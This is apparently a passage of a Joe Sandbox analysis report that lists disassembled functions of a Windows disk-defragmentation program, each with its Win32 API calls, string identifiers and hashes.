                                                                                                                                                                                                                                                                                                • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2897418849-3916222277
                                                                                                                                                                                                                                                                                                • Opcode ID: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                                • Instruction ID: af6e71f7250828e30cc2f680655b832ce69016c02ffdd7eabd90966ae28b2504
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 918371f1e30a1611824c586b15503814f3483ab0998594baaaceeb4de49a5514
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC1F3B11083419FC324CF69C984B6BBBE9FF88704F108A2EF59993290DB74E945CB56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                                • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                                • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 64815558-1687404023
                                                                                                                                                                                                                                                                                                • Opcode ID: 182fb5aa05407dff1fb33d3373427549e83ff2224f272dee2797ef27b0f06224
                                                                                                                                                                                                                                                                                                • Instruction ID: 4418ca87599e6f793fb4d10bf028e48e6936bb9db45e74f47fa123fcf7e21ce3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 182fb5aa05407dff1fb33d3373427549e83ff2224f272dee2797ef27b0f06224
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2151CAB1794701BAE350AB609C47FAB7268AB84B14F10C91FB75EB65C0CEFCA405875D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                                • Opcode ID: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                                • Instruction ID: 1067327c746e147da740696a904bc1cbb70a89f86cbb7c2e495eb833b01c89ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36413CF0B907407AD260AF618D43FEA3268AF84F04F60C42FB70E765D1CAEC6905969D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                                • Opcode ID: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                                • Instruction ID: 56ac88722a8962ac1f975558d68bc042bced7a88e006b99efbc398d4c5261ff8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B23156B07903007AE274EB258C83FEA72659F44B14F20452FB71E762D1CEF97844565C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                                • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                                • Opcode ID: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction ID: 43899c4dce7d941302b132538349e8bcafe351e88f225ab48a7149cde0acca41
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD316F707907017BD260BAB58C43FEA76A4AF84B04F20891BB65EB75C1CAF874419B9C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00451CBB
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D360,00000000,00000001,0047D170,?), ref: 00451CDF
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451CF8
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D24
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D4B
                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00451D72
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E17
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E1E
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00451E25
                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 00451E37
                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0047EF4C), ref: 00451E69
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00451EA8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit$String$AllocCreateFreeInitializeInstance
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 162617764-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                                • Instruction ID: 4a3acebe906db87488b43d3aef87afcda0e18f97818647458927d115f12b3f92
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08712875A183509FC310CF68C844A5ABBE8FF89B20F158A5EF99897360D775E804CF92
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 0043015F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00430211
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                                • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                                • Opcode ID: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 62bdf63df222c89057064cae7919c1e413492940edc838130925d2253cd5f780
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80C1E5312043008BC710EF24D995B9BB7E5BF88704F500A7EF9499B296DB74ED49CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                                • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                                • Instruction ID: e57791d17a927b35fa3e7b028ca1617c0da729b9688da5cd3a54cba97037c013
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB8119B11083819FD325DF65C984F9BB7E8FF88704F004A2DF58997291EB74A944CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ColorIndex, xrefs: 0042DA3E
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0042DA43
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                                • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                                • API String ID: 24576784-1631410767
                                                                                                                                                                                                                                                                                                • Opcode ID: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                                • Instruction ID: 821a5ab27c6a8f9e6b02cc0ac72b1b3995420b0d805852c9f35119affff3cd9f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2617EB1608340AFC304DF68D884E5BB7E8FF88714F408A2EF59997291DB74E944CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: \\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                                • Opcode ID: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                                • Instruction ID: 9c2aacaccead671dbc3a96f70d0e1eab3c71fbf61e1a23b3dd7d7caf89dd1f7c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C75109377043006BD214AF69AC86BAEB394EF9C725F80013FF509D3282DA255548C7AB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(1088D068), ref: 00422945
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                                • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]
                                                                                                                                                                                                                                                                                                • API String ID: 3043871728-3947735280
                                                                                                                                                                                                                                                                                                • Opcode ID: 12aba4a97e714f3a74ed8847fff63567ff0577a5bbd9ac9787f27e08b8126eff
                                                                                                                                                                                                                                                                                                • Instruction ID: c9e3dbd840687df198e490246c1b34f6b1a62d60348da21d10426e52b8988a23
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12aba4a97e714f3a74ed8847fff63567ff0577a5bbd9ac9787f27e08b8126eff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B4196F17543006AD764EB64DC42F9F72A8AF84B10F20C91FB65EA26C0CEBC640547AD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042EAE3
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042EAF7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0042EB36
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402007$3402033$3402037$3402038$3402039$3402040
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3173017236
                                                                                                                                                                                                                                                                                                • Opcode ID: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                                • Instruction ID: f302c9e8cacf912969436f53e573b816ab0f893bb8e7c3a9347613e7e3a9d812
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cbccfbbc1fd63c8a78153f1b809b30710d94fdfea326ecc7c254d81bae311d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0021D7F0BE074035E6B5BA614D43FEE21295F84F49F20880BB75E7A9C2CADC3941629D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0045382E
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                                • String ID: $6
                                                                                                                                                                                                                                                                                                • API String ID: 201260696-4183747533
                                                                                                                                                                                                                                                                                                • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 005045EA
                                                                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 005046F8
                                                                                                                                                                                                                                                                                                • CatchIt.LIBVCRUNTIME ref: 00504749
                                                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 0050484A
                                                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00504865
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                                                                                • Opcode ID: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 4c312c5944364cf67c01a2669073ec3c682224089c6a705f39cce00d7300e0bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B19DB180020AEFCF14DFA4C8859AEBFB5FF45310F14855AEA156B292D331DA61CF91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
